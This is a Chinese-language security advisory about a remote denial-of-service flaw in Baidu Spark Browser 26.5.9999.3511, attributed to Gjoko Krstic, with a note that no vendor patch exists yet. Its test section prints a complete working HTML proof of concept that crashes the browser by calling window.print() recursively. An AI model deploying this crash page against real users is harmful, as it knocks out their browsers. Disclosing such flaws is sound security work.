发布日期:2014-03-10
更新日期:2014-07-02
受影响系统:
Baidu Spark Browser 26.5.9999.3511
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 68288
Baidu Spark浏览器是基于Chromium的Web浏览器。
Baidu Spark Browser 26.5.9999.3511及其他版本在实现上存在远程拒绝服务漏洞,成功利用后可允许攻击者使受影响浏览器崩溃,导致拒绝服务。
<*来源:Gjoko 'LiquidWorm' Krstic
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<html>
<title>Baidu Spark Browser v26.5.9999.3511 Remote Stack Overflow DoS PoC</title>
<body bgcolor="#50708C">
<center>
<p><font color="#e3e3e3">Baidu Spark Browser v26.5.9999.3511 Remote Stack Overflow DoS PoC</font></p>
<button onClick=crash()>Execute!</button>
</center>
<script>
function crash(){
window.print();
crash();
}
</script>
</body>
</html>
建议:
--------------------------------------------------------------------------------
厂商补丁:
Baidu
-----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: